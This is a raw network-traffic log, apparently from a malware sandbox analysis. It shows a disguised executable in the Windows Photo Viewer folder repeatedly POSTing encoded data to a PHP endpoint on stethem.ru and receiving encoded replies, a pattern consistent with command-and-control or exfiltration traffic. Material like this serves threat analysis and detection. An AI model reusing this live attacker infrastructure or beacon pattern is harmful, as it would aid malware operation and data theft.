Dec 28, 2024 22:18:45.426094055 CET	795	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0OYj60SLs%2FlcDQ%2BPUngbHLqtDV9lvNZDjxCOjrMqnI9iqbdNxVJl84lWZIBKiDBuArwLQ%2FaUP0ZqZWepa%2F4rKsLLtPwE0A44xrLq70XISAqZWhFhGL6Rd5TYu1b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495ab4f59ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3550&min_rtt=2020&rtt_var=3818&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=102362&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:45.666321039 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:46.082953930 CET	1072	OUT	Data Raw: 5f 59 58 56 5b 44 54 51 5c 57 57 56 5a 5e 54 56 55 56 59 5d 55 54 57 5b 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _YXV[DTQ\WWVZ^TVUVY]UTW[ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9=3+?.]&<0$#] #],)3-0R61.D$^*8![",\-.
Dec 28, 2024 22:18:46.749974012 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:46.987458944 CET	798	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9l%2BSf7ZO%2BQ4wCnhuwRwr7N1k2IMchl%2FLTw4860%2FF4UmEM2QMUKiUy3g67LJdr%2BKPiDWy7m5Q1vANccBexMMAwSU0LIkH4uX%2BuIlGjB9bZ0O9sLkmjZQ9O1OZn03"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495b53973efa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4489&min_rtt=1977&rtt_var=5765&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=66141&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:47.302505970 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:47.657660007 CET	1072	OUT	Data Raw: 5a 5d 5d 56 5e 42 54 5d 5c 57 57 56 5a 5c 54 57 55 52 59 5b 55 57 57 5b 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z]]V^BT]\WWVZ\TWURY[UWW[ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:),<-)'<_07[79+\8'>#6#:%5%(1];![",\-&
Dec 28, 2024 22:18:48.433284044 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:48.680531979 CET	799	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMSoPzH%2B9rZe9vD7%2FQNwIGGxuDIN8V7iPLf%2FUeWfT9%2B7ZRMViWt3veJsGrj6Q%2FPIhSeXNBRoFOLrZuoSftcNO7rRNILAXPZ5iM07P9JgHyGVnHNkdh%2FPp05Xjm4i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495bfb8c48c12-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6987&min_rtt=1992&rtt_var=10737&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=34800&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:49.520864964 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:49.876327038 CET	1072	OUT	Data Raw: 5a 5a 58 54 5e 46 51 50 5c 57 57 56 5a 5f 54 52 55 5b 59 59 55 5d 57 5e 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZZXT^FQP\WWVZ_TRU[YYU]W^ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:0(=>!%8X3$3 9;/)&> V!"]%&:%()^;![",\-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49757	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:50.528892040 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:50.875586987 CET	1788	OUT	Data Raw: 5a 5d 58 56 5b 44 51 52 5c 57 57 56 5a 5c 54 5b 55 57 59 5c 55 54 57 5b 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z]XV[DQR\WWVZ\T[UWY\UTW[ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:>Y?>%<^&7, ,)X'=,6#&&50%X/![",\-&
Dec 28, 2024 22:18:51.704438925 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:51.958070993 CET	944	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDYe2VFB0t2kCV6xE83Ym0DmQVDTFJqT6jSBJEuXLMvOPlIFqymsQydoHA11IU%2BhxNjnRzRXoImnlg0tf2%2B%2FgFdYextc9QToPPprCozxWzkneq2Ro%2FRWiAK9IsWn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495d42ffa18bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3030&min_rtt=1482&rtt_var=3652&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=105285&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 50 23 35 03 0f 36 1d 32 0a 33 07 00 51 28 0e 23 59 2b 09 2d 10 30 17 0a 56 2a 23 02 50 24 39 26 58 24 2e 2a 57 24 02 08 12 24 39 28 51 06 12 22 18 22 11 2f 55 2d 39 3c 00 33 09 3e 44 21 03 2a 01 33 17 08 0d 32 38 21 10 22 3a 33 18 38 2a 39 56 28 29 0e 08 3f 31 31 01 37 01 2e 57 02 13 27 51 28 3d 38 0e 21 08 38 02 27 2b 3f 14 35 2f 2d 54 30 17 32 54 20 2d 27 14 3d 12 20 5c 23 27 02 0c 2a 2a 3f 13 20 2b 3b 0f 28 13 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"P#5623Q(#Y+-0V#P$9&X$.W$$9(Q""/U-9<3>D!328!":389V()?117.W'Q(=8!8'+?5/-T02T -'= \#'**? +;("U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:50.648310900 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:51.000559092 CET	1072	OUT	Data Raw: 5a 5b 58 54 5b 44 51 57 5c 57 57 56 5a 59 54 51 55 56 59 5b 55 50 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z[XT[DQW\WWVZYTQUVY[UPWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9) 0Y?5'?''4"9?8:0X$.,S# %&&%3)];![",\-2
Dec 28, 2024 22:18:51.779419899 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:52.025027990 CET	787	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3au7iotR9IvCN9Ym02yAHjDy4izhErmVUP9wtY3chtcGm8SvrOCq%2Bn4SBriRz3snwzBgQeBDlHSuH%2F14EH91qa5J7yRMOhw71fX%2Fs35oiHqtZndngln62MjTTN5L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495d4aa204201-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4379&min_rtt=1624&rtt_var=6119&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=61697&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a Data Ascii: 4>[[X
Dec 28, 2024 22:18:52.226099014 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49759	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:52.467895031 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:52.813074112 CET	1072	OUT	Data Raw: 5a 5c 5d 51 5e 48 54 55 5c 57 57 56 5a 5f 54 52 55 50 59 5d 55 54 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z\]Q^HTU\WWVZ_TRUPY]UTW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y)+<%Z&/ $7, 8;Z0?59%%3)-<![",\-*
Dec 28, 2024 22:18:53.598453045 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:53.845257044 CET	796	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j78Gz8VC3L%2BUrh3%2FE%2Ffzae1NDugy1wTSbaCcEsUw8YR2EvqNWhvUBeqAFON7V3wIU8YTE%2BnS35xHt6ul0dRzbQCVhso2fb%2B7wTfuxo5F0ZHzApytMWdggEAgevYf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495e00e3215d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3620&min_rtt=1650&rtt_var=4559&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=83840&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49760	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:54.086431980 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:54.438194036 CET	1072	OUT	Data Raw: 5f 5f 58 57 5e 43 54 56 5c 57 57 56 5a 55 54 54 55 53 59 5f 55 5d 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __XW^CTV\WWVZUTTUSY_U]WSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y#=-&<4'B/Z"97Y;Y3-"-&6%'8",![",\-
Dec 28, 2024 22:18:55.217571974 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:55.464848042 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYoh3us9DVCIB8toR93iFcNXCpR0c0HSCViHHXPMSd4Q83QZ6AgB3FUPHDHcGqUVc08w6Pdoh3vEul%2FfM%2BGErpc9wsXzGylDduQiIKT0NpNNx1oY3SKh5DJP0pka"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495ea2a8e42c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4569&min_rtt=1873&rtt_var=6096&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=62265&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49761	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:55.870553017 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:56.219489098 CET	1072	OUT	Data Raw: 5f 5c 5d 50 5e 48 54 51 5c 57 57 56 5a 5f 54 52 55 53 59 5a 55 53 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _\]P^HTQ\WWVZ_TRUSYZUSWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9#<]<=X%/7$+Z );3.8532)3-<![",\-
Dec 28, 2024 22:18:57.051827908 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49762	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:57.105844021 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:57.453980923 CET	1788	OUT	Data Raw: 5a 53 5d 51 5e 44 54 50 5c 57 57 56 5a 5f 54 52 55 54 59 5f 55 51 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZS]Q^DTP\WWVZ_TRUTY_UQW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9_)#'(-"1?'$/Z 830=P!&%(=^/<![",\-*
Dec 28, 2024 22:18:58.236699104 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:58.503462076 CET	945	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El6TFX%2F%2FNm%2FbxpzxghM0ObS8YFN8ST%2FCCZQBJT5uplsO4yO%2FR0UkPi5m8K7luMKEB8gGoBEfcKPDizJ51zwOCtu42bRc9Wt2212rZS27LX0fYNzhn4Qr0AXPaRJJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495fd0eae1a2c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4142&min_rtt=1879&rtt_var=5231&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=73054&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 1d 20 26 36 51 20 20 35 56 27 39 25 0f 28 51 33 10 2b 09 2d 5b 24 29 05 0b 29 0a 34 16 24 3a 25 06 24 00 04 1c 33 02 35 06 25 29 28 51 06 12 22 1d 36 06 3b 56 2d 2a 0d 58 30 20 25 1d 22 3d 18 00 27 29 31 18 32 2b 21 12 35 39 3b 18 2c 2a 36 0a 2a 39 09 18 2a 31 07 00 23 11 2e 57 02 13 27 50 3f 58 34 0c 36 57 23 58 30 28 24 05 20 3c 3d 18 24 5f 35 0a 34 13 2f 1a 2a 3f 20 1b 34 09 23 53 3d 00 38 07 21 38 3c 1d 29 39 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98" &6Q 5V'9%(Q3+-[$))4$:%$35%)(Q"6;V-X0 %"=')12+!59;,691#.W'P?X46W#X0($ <=$_54/*? 4#S=8!8<)9"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49763	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:57.225465059 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:57.578743935 CET	1072	OUT	Data Raw: 5a 5f 58 52 5e 44 51 57 5c 57 57 56 5a 54 54 57 55 5b 59 5c 55 55 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z_XR^DQW\WWVZTTWU[Y\UUWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)?X>&3$#["9(//006.Y&%&A$)Y;![",\-
Dec 28, 2024 22:18:58.383411884 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:58.615850925 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZcTanxYZn5WMcsVnEsmjDmXZPifqDwiVA7HC3wSZqxgL57H8PkX7H5U%2F3izElzgfUsDL1Jg1HLA%2B5O%2FZdhduk7sEi9Dmf62vXD2q9oVomBGAm58DcGDzHidj%2FNux"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495fdcf7a0f6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4556&min_rtt=1485&rtt_var=6700&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=56031&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49764	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:58.852401972 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
